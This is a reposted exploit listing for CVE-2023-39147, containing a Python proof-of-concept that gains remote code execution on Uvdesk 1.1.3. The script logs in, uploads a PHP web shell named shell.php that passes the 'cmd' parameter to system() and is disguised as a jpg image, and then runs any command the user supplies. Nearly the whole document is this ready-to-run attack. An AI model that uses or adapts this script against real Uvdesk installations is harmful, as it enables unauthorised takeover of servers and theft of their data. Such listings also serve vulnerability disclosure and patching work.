Advertisement






Uvdesk 1.1.3 Shell Upload

CVE Category Price Severity
CVE-2023-39147 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-08-01
CVSS
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080003

Below is a copy:

Uvdesk 1.1.3 Shell Upload
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security 
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6


import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    base_url = args.url

    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

# Edit your credentials here
    login_data = {
        "_username": "[email protected]",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.session()
    # Login
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)

if __name__ == "__main__":
    main()
            

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.